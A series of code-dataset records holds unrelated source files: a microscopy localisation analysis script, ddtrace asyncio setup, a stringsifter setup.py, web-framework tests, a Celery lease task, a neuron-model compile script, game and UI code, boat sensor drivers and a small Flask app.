'_analysisResult.csv'\n\n#open picasso hdf5 file as DF\nlocs = pd.read_hdf(filePath, '/locs')\n#check header\nheaders = locs.dtypes.index\nprint(headers)\nprint(locs.shape)\nprint(locs.head(n=5))\n\n#scatter plot\n#locs.plot.scatter(x='x',y='y', s=1, c='photons')\nlocs.plot.scatter(x='x',y='y', s=0.1, c='lpx', colormap='hot')\nx = locs['x']\ny = locs['y']\nphotons=locs['photons']\nlpx = locs['lpx']\nlpy = locs['lpy']\n\n\n#group by 'group' - get mean values\ngroupedLocs = locs.groupby('group',as_index=False).mean().drop(['frame', 'x', 'y', 'sx', 'sy', 'bg', 'lpx', 'lpy'],axis=1)\n#groupedLocs.rename(index=str,columns={'x':'meanX', 'y':'meanY', 'photons':'meanPHOTONS', 'sx':'meanSX', 'sy':'meanSY', 'bg':'meanBG', 'lpx':'meanLPX', 'lpy':'meanLPY'},inplace=True)\ngroupedLocs.rename(index=str,columns={'photons':'meanPHOTONS'},inplace=True)\n\n#merge locs and groupedLocs based on group\nlocs = locs.merge(groupedLocs, on='group', how='outer')\n\n#add normalized photon count (photons normalized by group mean photons)\nlocs['photons_normalized'] = np.divide(locs['photons'],locs['meanPHOTONS'])\n\n#plt.figure(1)\n#plt.scatter(x,y, s=1,c=photons)\n#plt.scatter(x,y, s=1,c=lpx)\n\n#guassian blur\nnBins = 750\nH, xedges, yedges = np.histogram2d(x,y,bins=nBins )\nH_guass = gaussian_filter(H, sigma=5)\n\nH_guassMask = H_guass < 5\nH_guass[H_guassMask] = [0] \n\n\nfig2, ax0 = plt.subplots()\nax0.imshow(np.rot90(H_guass))\nX, Y = np.meshgrid(xedges, yedges)\nax0.pcolormesh(X, Y, H_guass)\n\n\n#threshold\n#gray = rgb2gray(H_guass)\nthresholded = threshold_local(H_guass, 3) \nbinary_adaptive = H_guass > thresholded\n\n#fig3, ax = plt.subplots()\n#ax.pcolormesh(X, Y, binary_adaptive)\n\n#blob detection ##REPLACED BY WATERSHED DETECTION##\n#labels = measure.label(binary_adaptive)\n\n#watershed\nD = distance_transform_edt(binary_adaptive)\nlocalMax = peak_local_max(D, indices=False,min_distance=5)\n# perform a connected component analysis on the local peaks,\n# using 8-connectivity, then appy the Watershed algorithm\nmarkers = label(localMax, structure=np.ones((3, 3)))[0]\nlabels = watershed(-D, markers, mask=binary_adaptive)\nprint(\"[INFO] {} unique segments found\".format(len(np.unique(labels)) - 1))\n\n\nfig3, ax = plt.subplots()\nax.pcolormesh(X, Y, D)\n#ax.pcolormesh(X, Y, labels)\n#ax.pcolormesh(X, Y, mask)\n\n\n\n\n#for scaling\nminXValue = min(xedges)\nmaxXValue = max(xedges)\nminYValue = min(yedges)\nmaxYValue = max(yedges)\n\nxRange = maxXValue - minXValue\nyRange = maxYValue - minYValue\n\ncenteroids = []\nboxProps = []\n\n\nfor region in measure.regionprops(labels):\n # take regions with large enough areas\n if region.area >= 200 and region.area < 1200 and region.solidity > 0.8:\n\t\n # draw rectangle around segmented objects\n minr, minc, maxr, maxc = region.bbox\n \n #scale to match original data range\n minr = (np.divide(minr,nBins) * yRange) + minYValue\n minc = (np.divide(minc,nBins) * xRange) + minXValue\n maxr = (np.divide(maxr,nBins) * yRange) + minYValue\n maxc = (np.divide(maxc,nBins) * xRange) + minXValue\n \n boxProps.append([minr,minc,maxr,maxc])\n \n #get centeroid\n (cent_x,cent_y) = region.centroid \n cent_y = (np.divide(cent_y,nBins) * yRange) + minYValue\n cent_x = (np.divide(cent_x,nBins) * xRange) + minXValue\n \n centeroids.append([cent_x,cent_y]) \n\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n\t\t\t\t\t\t\t\t\t\t\t\tfill=False, edgecolor='red', linewidth=2)\n \n ax.add_patch(rect)\n\n#manually add centeroids here, if needed\n#centeroids = centeroids + [[],[],[]]\n\ncenteroids = np.array(centeroids)\n\n#plt.figure(4)\nfig4, ax2 = plt.subplots()\nax2.scatter(x,y, s=0.1, color='black')\n\n\n\n#filter locs by centeroid positions\nsearchArea = 0.035 * 0.035\nfilteredLocs= pd.DataFrame()\n\nfor i in range(len(centeroids)):\n query = \"SELECT * FROM locs WHERE (((locs.x - {})*(locs.x - {})) + ((locs.y - {})*(locs.y - {}))) <= ({})\".format(centeroids[i][0], centeroids[i][0], centeroids[i][1], centeroids[i][1], searchArea)\n filtered = ps.sqldf(query,locals())\n filtered['bindingSite'] = i\n filteredLocs = filteredLocs.append(filtered)\n print(i)\n\n\n#export filteredDF\nfilteredLocs.to_csv(savePath)\n\n\n\n##########################################################################################################\n\n#filteredLocs.plot.scatter(x='x',y='y', s=0.1, color='black')\n\nax2.scatter(x=filteredLocs.x, y=filteredLocs.y, s=0.1, color='blue')\nax2.scatter(centeroids[:,0],centeroids[:,1], color='red')\n\n\n#get background from manually selected locations\n\nbackGroundLocs = pd.DataFrame()\n\nfor i in range(len(backgroundCenteroids)):\n query = \"SELECT * FROM locs WHERE (((locs.x - {})*(locs.x - {})) + ((locs.y - {})*(locs.y - {}))) <= ({})\".format(backgroundCenteroids[i][0], backgroundCenteroids[i][0], backgroundCenteroids[i][1], backgroundCenteroids[i][1], searchArea)\n filtered = ps.sqldf(query,locals())\n filtered['bindingSite'] = i\n backGroundLocs = backGroundLocs.append(filtered)\n print(i)\n\n#backGroundLocs.plot.scatter(x='x',y='y', s=0.1, color='black')\n\nax2.scatter(x=backGroundLocs.x, y=backGroundLocs.y, s=0.1, color='green')\nax2.scatter(backgroundCenteroids[:,0],backgroundCenteroids[:,1], color='yellow') \n\n#plot all binding sites against time\nfilteredLocs.plot.scatter(x='frame',y='photons_normalized',c='bindingSite',colormap='tab20b',s=0.5)\nfilteredLocs.plot.scatter(x='frame',y='photons',c='bindingSite',colormap='tab20b',s=0.5)\n\nfilteredLocs.hist('photons_normalized',bins=1000)\nfilteredLocs.hist('photons',bins=1000)\n\nbackGroundLocs.hist('photons_normalized',bins=1000)\nbackGroundLocs.hist('photons',bins=1000)\n\n#plot by binding site\ndef createPlot(df, groupNumber = [0], bindingSite = 0, filterByGroup = True, normalized = True):\n #if filter by group true:\n if filterByGroup:\n group = df.loc[(df.group.isin(groupNumber)) & (df.bindingSite == bindingSite)]\n else:\n group = df.loc[df.bindingSite == bindingSite]\n \n #plot group histogram photons\n if normalized:\n group.hist(column='photons_normalized',bins=40)\n else:\n group.hist(column='photons',bins=40)\n\n #plot histo frames\n group.hist(column='frame', bins=40)\n \n #plot group photons / frame\n if normalized:\n group.plot.scatter(x='frame', y='photons_normalized')\n else:\n group.plot.scatter(x='frame', y='photons') \n \n return\n\n\n#createPlot(filteredLocs, groupNumber = [0], bindingSite = 0, normalized=True)\n#createPlot(filteredLocs, bindingSite = 12, filterByGroup = False)\ncreatePlot(filteredLocs, bindingSite = 0, filterByGroup = False, normalized = False)\n\n#plot all binding sites seperately\n#for i in range(max(filteredLocs['bindingSite'])):\n# createPlot(filteredLocs, bindingSite = i, filterByGroup = False, normalized = False)\n# print(i)\n\n\n#get number of binding sites per object\n\ndef bindingSitePlot(df, groupNumber = 0, numberOfBindingSites = len(centeroids)):\n group = df.loc[df.group == groupNumber]\n bindingSites = group.groupby('bindingSite',as_index=False).count().drop(['x', 'y', 'photons', 'sx', 'sy', 'bg', 'lpx', 'lpy', \n 'meanPHOTONS', 'photons_normalized'],axis=1)\n #bindingSites['group'] = groupNumber\n #bindingSites.rename(index=str,columns={'frame':'numberOfLocalizations'},inplace=True)\n #print(bindingSites)\n #group.hist(column='bindingSite',bins=numberOfBindingSites)\n count,division = np.histogram(group['bindingSite'], bins=numberOfBindingSites)\n return count\n\n#binding sites\nnumberOfBindingSites = len(filteredLocs['bindingSite'].unique()) \nbindingSiteDF = pd.DataFrame(columns=list(range(numberOfBindingSites))).astype(int) \nfor i in range(len(filteredLocs['group'].unique())):\n bindingSiteDF.loc[i] = bindingSitePlot(filteredLocs, groupNumber = i)\n \n#background\nnumberOfBackgroundSites = len(backGroundLocs['bindingSite'].unique()) \nbackgroundDF = pd.DataFrame(columns=list(range(numberOfBackgroundSites))).astype(int) \nfor i in range(len(backGroundLocs['group'].unique())):\n backgroundDF.loc[i] = bindingSitePlot(backGroundLocs, groupNumber = i, numberOfBindingSites = numberOfBackgroundSites)\n\n\nbackgroundStats = backgroundDF.describe()\nbackgroundMean = np.mean(backgroundStats.loc['mean'].values)\n\n\nbindingSiteStatDF = pd.DataFrame()\n\nbindingSiteStatDF['zeros'] = (bindingSiteDF < backgroundMean).astype(int).sum(axis=1)\nbindingSiteStatDF['numberOfBindingSites'] = (numberOfBindingSites - bindingSiteStatDF['zeros'])\n\n#fig5, ax3 = plt.subplots()\nfig5 = bindingSiteStatDF.hist(column='numberOfBindingSites', bins=numberOfBindingSites+1)\nfig5.flatten()[0].set_xlabel('number of binding sites per origami')\nfig5.flatten()[0].set_ylabel('number of origami')\n\nstats = bindingSiteDF.describe()\nind = np.arange(numberOfBindingSites)\nsiteMean = stats.loc['mean'].values\nsiteStd = stats.loc['std'].values\n\nfig6, ax4 = plt.subplots()\nax4.bar(ind,siteMean, width=0.5, yerr = siteStd)\nax4.set_xlabel('binding site')\nax4.set_ylabel('mean localizations per origami')\n\n\nsiteMap = bindingSiteDF > backgroundMean\nsiteMap_stats = siteMap.describe()\nsiteFrequency = siteMap_stats.loc['freq'].values\n\nnumberOfGroups = len(filteredLocs['group'].unique())\n\nsitePercent = siteFrequency / numberOfGroups\n\nfig7, ax5 = plt.subplots()\nax5.bar(ind,sitePercent, width=0.5)\nax5.set_ylabel('site frequency (%)')\nax5.set_xlabel('binding site')\n\ncenteroidGroups=range(len(centeroids))\n\nfig8, ax6 = plt.subplots()\nscatter = ax6.scatter(centeroids[:,0],centeroids[:,1], s=800, c=sitePercent, cmap='hot',edgecolors='black',linewidths=1)\nlegend = ax6.legend(*scatter.legend_elements(),\n loc=\"lower left\", title=\"site frequency\")\n#ax6.axis([0,512,0,512])\nax6.add_artist(legend) \nfor i,txt in enumerate(centeroidGroups):\n ax6.annotate(txt, (centeroids[i][0]+0.02,centeroids[i][1]))\n\n\n\n\n\n\n","sub_path":"BSU/TestALL_analysis_2.py","file_name":"TestALL_analysis_2.py","file_ext":"py","file_size_in_byte":12736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"491462795","text":"\"\"\"\nThis integration provides the ``AsyncioContextProvider`` that follows the execution\nflow of a ``Task``, making possible to trace asynchronous code built on top\nof ``asyncio``. To trace asynchronous execution, you must::\n\n import asyncio\n from ddtrace import tracer\n from ddtrace.contrib.asyncio import context_provider\n\n # enable asyncio support\n tracer.configure(context_provider=context_provider)\n\n async def some_work():\n with tracer.trace('asyncio.some_work'):\n # do something\n\n # launch your coroutines as usual\n loop = asyncio.get_event_loop()\n loop.run_until_complete(some_work())\n loop.close()\n\nIf ``contextvars`` is available, we use the\n:class:`ddtrace.provider.DefaultContextProvider`, otherwise we use the legacy\n:class:`ddtrace.contrib.asyncio.provider.AsyncioContextProvider`.\n\nIn addition, helpers are provided to simplify how the tracing ``Context`` is\nhandled between scheduled coroutines and ``Future`` invoked in separated\nthreads:\n\n * ``set_call_context(task, ctx)``: attach the context to the given ``Task``\n so that it will be available from the ``tracer.get_call_context()``\n * ``ensure_future(coro_or_future, *, loop=None)``: wrapper for the\n ``asyncio.ensure_future`` that attaches the current context to a new\n ``Task`` instance\n * ``run_in_executor(loop, executor, func, *args)``: wrapper for the\n ``loop.run_in_executor`` that attaches the current context to the\n new thread so that the trace can be resumed regardless when\n it's executed\n * ``create_task(coro)``: creates a new asyncio ``Task`` that inherits\n the current active ``Context`` so that generated traces in the new task\n are attached to the main trace\n\nA ``patch(asyncio=True)`` is available if you want to automatically use above\nwrappers without changing your code. In that case, the patch method **must be\ncalled before** importing stdlib functions.\n\"\"\"\nfrom ...utils.importlib import require_modules\n\n\nrequired_modules = ['asyncio']\n\nwith require_modules(required_modules) as missing_modules:\n if not missing_modules:\n from .provider import AsyncioContextProvider\n from ...internal.context_manager import CONTEXTVARS_IS_AVAILABLE\n from ...provider import DefaultContextProvider\n\n if CONTEXTVARS_IS_AVAILABLE:\n context_provider = DefaultContextProvider()\n else:\n context_provider = AsyncioContextProvider()\n\n from .helpers import set_call_context, ensure_future, run_in_executor\n from .patch import patch\n\n __all__ = [\n 'context_provider',\n 'set_call_context',\n 'ensure_future',\n 'run_in_executor',\n 'patch'\n ]\n","sub_path":"ddtrace/contrib/asyncio/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"194418588","text":"import os\nfrom playhouse.sqlite_ext import SqliteExtDatabase\n\n# Replace this with a random value\nSECRET_KEY = 'shhh, secret!'\n\nTIMEZONE = \"Europe/Rome\"\nLOCALE = \"it_IT\"\n\n\n# APP path\nAPP_DIR = os.path.dirname(os.path.realpath(__file__))\n\n# Database connection\nDATABASE_FILE = os.path.join(APP_DIR, \"events.db\")\nDATABASE = SqliteExtDatabase(DATABASE_FILE)\n\n# Enable debug and cache update requests\nDEBUG = True\n\n# Base url for web app\nBASEURL = \"\"\n\n# Base url for static assets\nSTATIC_DIR = APP_DIR + \"/static\"\nSTATICURL = BASEURL + \"/static\"\n","sub_path":"sources/example.settings.py","file_name":"example.settings.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"108746493","text":"# Copyright (C) 2019 FireEye, Inc. All Rights Reserved.\n\nfrom setuptools import setup\nimport os\nimport re\n\n__all__ = ['metadata', 'setup']\n\n# Get the base directory\nhere = os.path.dirname(__file__)\nif not here:\n here = os.path.curdir\n\n# Text describing the module\nlong_description = 'stringsifter is a machine learning-based tool ' + \\\n 'that automatically ranks the output of the ' + \\\n '`strings` program for binary triage analysis.'\n\n# Get the version\nversfile = os.path.join(here, 'stringsifter', 'version.py')\n_version = {}\nwith open(versfile, 'r') as fid:\n exec(fid.read(), _version)\n\n# Do some Pipfile parsing to avoid two copies of the requirements,\n# but this is fragile\nreqsfile = os.path.join(here, 'Pipfile')\nrequirements = []\nwith open(reqsfile, 'r') as fid:\n in_packages_section = False\n for line in fid.readlines():\n if line.startswith('['):\n in_packages_section = line.rstrip() == '[packages]'\n continue\n if in_packages_section:\n m = re.match(r'([\\w-]+) *= *\"(.*)\"', line)\n if m:\n if m.group(2) == '*':\n requirements.append(m.group(1))\n else:\n requirements.append(m.group(1) + m.group(2))\n\n# Get the list of scripts\nscripts = []\n\n_packages = ['stringsifter', 'stringsifter/lib']\n\n_package_data = {'stringsifter': ['model/*.pkl',\n 'lib/*.pkl',\n 'lib/*.ftz',\n 'lib/*.json']}\n\n# Set the parameters for the setup script\nmetadata = {\n # Setup instructions\n 'provides': ['stringsifter'],\n 'packages': _packages,\n 'package_data': _package_data,\n 'scripts': scripts,\n 'entry_points': {\n 'console_scripts': ['rank_strings=stringsifter.rank_strings:argmain',\n 'flarestrings=stringsifter.flarestrings:main']\n },\n 'install_requires': requirements,\n 'python_requires': '<3.11',\n # Metadata\n 'name': 'stringsifter',\n 'version': _version['__version__'],\n 'description': 'stringsifter is a machine learning-based tool that ' + \\\n 'automatically ranks the output of the `strings` ' + \\\n 'program for binary triage analysis.',\n 'long_description': long_description,\n 'url': 'https://github.com/mandiant/stringsifter',\n 'download_url': 'https://github.com/mandiant/stringsifter',\n 'keywords': ['stringsifter', 'rank', 'strings', 'binary', 'triage'],\n }\n\n# Execute the setup script\nif __name__ == '__main__':\n setup(**metadata)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"359689935","text":"# -*- coding: UTF-8 -*-\nfrom plone.app.testing.bbb import PloneTestCase\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFDynamicViewFTI.interfaces import IDynamicViewTypeInformation\n\n\nclass TestBaseProfile(PloneTestCase):\n\n def afterSetUp(self):\n self.loginAsPortalOwner()\n qi = self.portal.portal_quickinstaller\n qi.uninstallProducts(['ATContentTypes'])\n portal_setup = self.portal.portal_setup\n portal_setup.runAllImportStepsFromProfile('profile-Products.ATContentTypes:base')\n\n def test_attypes_not_installed(self):\n tt = getToolByName(self.portal, 'portal_types')\n types = tt.listTypeInfo()\n for t in types:\n self.assertNotEqual(t.product, 'ATContentTypes')\n","sub_path":"buildout-cache--/eggs/Products.ATContentTypes-2.2.5-py2.7.egg/Products/ATContentTypes/tests/test_base_profile.py","file_name":"test_base_profile.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"251473820","text":"import pytest\n\nfrom bocadillo import API\n\n\n@pytest.mark.parametrize(\"data, status\", [(\"{\", 400), (\"{}\", 200)])\ndef test_parse_json(api: API, data: str, status: int):\n @api.route(\"/\")\n class Index:\n async def post(self, req, res):\n res.media = await req.json()\n\n assert api.client.post(\"/\", data=data).status_code == status\n\n\n@pytest.mark.parametrize(\n \"get_stream\", [lambda req: req, lambda req: req.stream()]\n)\ndef test_stream_request(api: API, get_stream):\n @api.route(\"/\")\n class Index:\n async def get(self, req, res):\n chunks = [\n chunk.decode() async for chunk in get_stream(req) if chunk\n ]\n res.media = chunks\n\n # For testing, we use a chunk-encoded request. See:\n # http://docs.python-requests.org/en/master/user/advanced/#chunk-encoded-requests\n\n message = \"Hello, world!\"\n\n def stream():\n for _ in range(3):\n yield message\n\n response = api.client.get(\"/\", data=stream())\n assert response.json() == [message] * 3\n","sub_path":"tests/test_http_request.py","file_name":"test_http_request.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"304671689","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nfrom leases.models import LeaseAgreement\nfrom leases.utils import LeaseAgreementStatus\nfrom payments.services import SubscriptionProcessor\nimport datetime\n\n@shared_task\ndef deactivate_lease_agreements():\n\tresult_set = LeaseAgreement.objects.filter(status=LeaseAgreementStatus.ACTIVE)\n\tfor result in result_set:\n\t\tnow = datetime.date.today()\n\t\tprint('Now: %r' % now)\n\t\tprint('Result end date: %r' % result.lease_end_date)\n\t\tif result.lease_end_date == now:\n\t\t\tdeactive_lease_agreement.delay(result.id)\n\n@shared_task\ndef deactive_lease_agreement(lease_agreement_id):\n\tlease_agreement = LeaseAgreement.objects.filter(pk=lease_agreement_id).first()\n\tif lease_agreement is None:\n\t\treturn\n\ttenants = lease_agreement.get_tenants()\n\tfor tenant in tenants:\n\t\tuser = tenant.user\n\t\tSubscriptionProcessor.unsubscribe(lease_agreement, user)\n\tlease_agreement.status = LeaseAgreementStatus.INACTIVE\n\tlease_agreement.save()","sub_path":"leases/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160653935","text":"queries = dict()\nqueryList = set()\n\nwith open(\"data/wt09.topics.queries-only\", \"r\") as f:\n for record in f:\n prefix, query = record.split(\":\")\n _, no = prefix.split(\"-\")\n queries[int(no.strip())] = [_.strip() for _ in query.split(\" \")]\n for q in queries[int(no.strip())]:\n queryList.add(q)\n\nqList = sorted(list(queryList))\n\nwith open(\"data/queryHTML.parameters\", \"w\") as f:\n f.write(\"\\n\\t/home/tong/lrank/indexHtml/\\n\\ttrue\\n\")\n for q in qList:\n f.write(\"\\t\\n\\t\\t{}\\n\\t\\n\".format(q))\n f.write(\"\\n\")\n","sub_path":"src/QueryParameters.py","file_name":"QueryParameters.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"22432443","text":"import os\nfrom glob import glob\n\nCWD = os.getcwd()\n\nNMODL = 'morphologies/hoc_combos_syn.1_0_10.allmods'\n\nneurons = glob(os.path.join('morphologies/hoc_combos_syn.1_0_10.allzips', 'L6*'))\nmech = 'mechanisms'\n\nif not os.path.isdir(NMODL):\n os.mkdir(NMODL)\ni = 0\nfor NRN in neurons:\n for nmodl in glob(os.path.join(NRN, 'mechanisms', '*.mod')):\n while not os.path.isfile(os.path.join(NMODL,\n os.path.split(nmodl)[-1])):\n os.system('cp {} {}'.format(nmodl,\n os.path.join(NMODL, '.')))\n print(\"copypasted {} out of {}\".format(i + 1, len(neurons)))\n i += 1\nos.chdir(NMODL)\nos.system('nrnivmodl')\nos.chdir(CWD)\n\n# neuron.load_mechanisms(NMODL)\n\n\n\n# for i, NRN in enumerate(neurons):\n# os.chdir(CWD)\n# os.chdir(NRN)\n# os.chdir(mech)\n# if os.path.isdir('x86_64'):\n# os.system('rm -r x86_64')\n# os.system('nrnivmodl')\n# print(\"compiled {} out of {}\".format(i + 1, len(neurons)))\n\n# os.chdir(CWD)\n","sub_path":"compile_epfl_models.py","file_name":"compile_epfl_models.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282860848","text":"import uiScriptLocale\n\nwindow = {\n\n\t\"x\" : 0,\n\t\"y\" : 0,\n\n\t\"width\" : SCREEN_WIDTH,\n\t\"height\" : SCREEN_HEIGHT,\n\n\t\"children\" :\n\t(\n\t\t## Board\n\t\t{\n\t\t\t\"name\" : \"BackGround\",\n\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\"x\" : 0,\n\t\t\t\"y\" : 0,\n\n\t\t\t\"image\" : \"d:/ymir work/ui/intro/pattern/Line_Pattern.tga\",\n\n\t\t\t\"x_scale\" : float(SCREEN_WIDTH) / 800.0,\n\t\t\t\"y_scale\" : float(SCREEN_HEIGHT) / 600.0,\n\t\t},\n\t\t{\n\t\t\t\"name\" : \"BackGround_Shadow\",\n\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\"x\" : 0,\n\t\t\t\"y\" : 0,\n\n\t\t\t\"image\" : \"yamato_load/art_mask_full.tga\",\n\n\t\t\t\"x_scale\" : float(SCREEN_WIDTH) / 1920.0,\n\t\t\t\"y_scale\" : float(SCREEN_HEIGHT) / 1080.0,\n\t\t},\n\t\t{ \n\t\t\t\"name\":\"ErrorMessage\", \n\t\t\t\"type\":\"text\", \"x\":10, \"y\":10, \n\t\t\t\"text\": uiScriptLocale.LOAD_ERROR, \n\t\t},\n\t\t{\n\t\t\t\"name\" : \"tipTextLine\",\n\t\t\t\"type\" : \"text\",\n\t\t\t\n\t\t\t\"x\" : SCREEN_WIDTH / 2,\n\t\t\t\"y\" : 18,\n\t\t\t\n\t\t\t\n\t\t\t\"text\" : \"Wusstest du schon das der Mönch dir die möglichkeit bietet Achievement-Points einzutauschen? Nein? Besuch ihn doch einfach mal.\",\n\t\t\n\t\t\t\"text_horizontal_align\" : \"center\",\n\t\t\t\n\t\t\t\"outline\" : 1,\n\t\t\n\t\t},\n\t\t\n\t\t{\n\t\t\t\"name\" : \"GageBoard\",\n\t\t\t\"type\" : \"window\",\n \"style\" : (\"ltr\",),\n\t\t\t\"x\" : float(SCREEN_WIDTH) * 400 / 800.0 - 475,\n\t\t\t\"y\" : float(SCREEN_HEIGHT) * 500 / 600.0 + 50,\n\t\t\t\"width\" : 400, \n\t\t\t\"height\": 80,\n\n\t\t\t\"children\" :\n\t\t\t(\n\t\t\t\n\t\t\t\t{\n\t\t\t\t\t\"name\" : \"BackGage\",\n\t\t\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\t\t\"x\" : 40,\n\t\t\t\t\t\"y\" : 25,\n\n\t\t\t\t\t\"image\" : \"yamato_load/loading_bar_empty_frame.tga\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"name\" : \"FullGage\",\n\t\t\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\t\t\"x\" : 75,\n\t\t\t\t\t\"y\" : 50,\n\n\t\t\t\t\t\"image\" : \"yamato_load/loading_fill.tga\",\n\t\t\t\t},\n\t\t\t),\n\t\t},\n\t),\n}\n","sub_path":"multi_locale/locale/en/ui/loadingwindow.py","file_name":"loadingwindow.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"457237424","text":"import pygame\n\nimport constants\nfrom Entity import *\n\nclass Player(Entity):\n def __init__(self, manager, position, map, name = \"Player\"):\n Entity.__init__(self, manager, position, 10, map, constants.S_PLAYER, name)\n self.turnEnded = False\n\n def endTurn(self):\n self.turnEnded = True\n\n def death(self):\n Entity.death(self)\n print(\"you died!\")\n\n def input(self, event):\n if event.type == pygame.KEYDOWN:\n self.movement(event)\n\n def movement(self, event):\n \"\"\"\n Function that handles the input for movement\n only gets called when you are in the movement state\n \"\"\"\n # Down\n if event.key == pygame.K_k:\n self.move((0, -1))\n self.endTurn()\n # Up\n if event.key == pygame.K_j:\n self.move((0, 1))\n self.endTurn()\n # Left\n if event.key == pygame.K_h:\n self.move((-1, 0))\n self.endTurn()\n # Right\n if event.key == pygame.K_l:\n self.move(( 1, 0))\n self.endTurn()\n # Idle\n if event.key == pygame.K_i:\n self.endTurn()\n\n","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"519010309","text":"import numpy as np\nfrom cap_driver_py3 import *\nfrom driver_acc import *\nfrom threading import Thread\nfrom gps_driver_py3 import *\nimport time\n\ndef transforme(diff):\n\tvalue=diff+7*np.pi\n\treturn value-2*np.pi*int(value*0.5/np.pi)-np.pi\n\ndef pause(t,h,i):\n\tt+=h*(i+1)\n\tt2 = time.time()\n\tif t>t2:\n\t\ttime.sleep(t-t2)\n\telse:\n\t\t#print(\"Prob t\")\n\t\ta=1\n\ndef orient(vect):\n\tX,Y=vect[0],vect[1]\n\tnorme = (X**2+Y**2)**0.5\n\tX/=-norme\n\tY/=norme\n\tangle = np.arccos(X)\n\tif Y<0:\n\t\tangle=2*np.pi-angle\n\treturn angle-np.pi\n\n\nclass Capteur(Thread):\n\tdef __init__(self,t0,enrg=False,taille=1):\n\t\tThread.__init__(self)\n\t\tself.gps = GPS(t0,True,self.get_Cap)\n\t\tself.over = False\n\t\tself.enrg = enrg\n\t\tself.taille = int(taille*100)\n\t\tself.t0=t0\n\t\tself.pos=-1\n\t\tself.cap = Cap_driver()\n\t\tself.acc = acc_driver()\n\t\tself.sensibilite = 250\n\t\tself.listeChoc=[0]\n\t\tself.impact = False\n\t\tself.data = []\n\t\tfor i in range(self.taille):\n\t\t\tself.data.append([i*0.01,np.array([0,0,0]),0,np.array([0,0,0,0,0,0]),0])\n\t\tself.data[-1][2]=orient(self.cap.get())\n\t\tself.data[-1][4]=orient(self.cap.get())\n\t\tself.offset=0\n\t\tself.offset2=0\n\t\tself.moyenneFait = False\n\t\t\n\t\n\tdef finit(self):\n\t\tself.over = True\n\t\n\tdef sauve(self):\n\t\tfichier = np.zeros((self.taille,12))\n\t\tfor i in range(self.taille):\n\t\t\tfichier[i,0]=self.data[i][0]\n\t\t\tfichier[i,1:4]=self.data[i][1][:]\n\t\t\tfichier[i,4:10]=self.data[i][3][:]\n\t\t\tfichier[i,11]=self.data[i][2]\n\t\t\tfichier[i,10]=self.data[i][4]\n\t\tnp.savetxt(\"all_data.txt\",fichier)\n\t\tnp.savetxt(\"impact_time.txt\",np.array(self.listeChoc))\n\t\n\tdef filtre(self,Id):\n\t\tnouv = orient(self.data[Id][1])\n\t\tself.data[Id][4]=nouv\n\t\trot = (4*360./165.69)*0.01*(self.data[Id][3][5]-self.offset)*np.pi/(180.*1000.)\n\t\tdiff1 = transforme(nouv-self.data[self.pos][2])\n\t\tdiff2 = rot\n\t\tif self.moyenneFait:\n\t\t\treturn transforme(self.data[self.pos][2]+(0.995*diff2+0.005*diff1))\n\t\telse:\n\t\t\treturn transforme(self.data[self.pos][2]+diff1)\n\t\n\tdef run(self):\n\t\ti=0\n\t\th=0.01\n\t\tself.gps.start()\n\t\ttstart = time.time()\n\t\twhile not self.over and (iself.sensibilite and self.listeChoc[-1]+220:\n\t\t\tself.listeChoc.append(time.time()-self.t0)\n\t\t\treturn True\n\t\treturn False\n\n\n\n\n\n\n\n","sub_path":"récup finale ddboat/S4_odo_klein_bet/py3/driver_capteur.py","file_name":"driver_capteur.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336139738","text":"#!/usr/bin/python\n#coding:utf-8\n'''\n使用flask框架建立web网站\n'''\n#pip install flask\nfrom flask import Flask\n#引入flask框架为我们提供的调用模板函数\nfrom flask import render_template\n#用Flask方法建立app对象,一般默认把本文件设置为app对象\napp = Flask(__name__)\n\n\n#设置编码\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n#web网站初尝试之Hello world\n#route路由 将url和函数进行一对一映射,访问url时,就会被路由转发到指定函数进行响应\n\n#route map\n@app.route(\"/hello/\")#在网站端口号后面加上hello 就会执行hello函数 起名字就是为了设置一个标识\ndef Hello():\n\treturn render_template(\"main.html\")\n\n@app.route(\"/main/\")\ndef main():\n\treturn \"

this is main

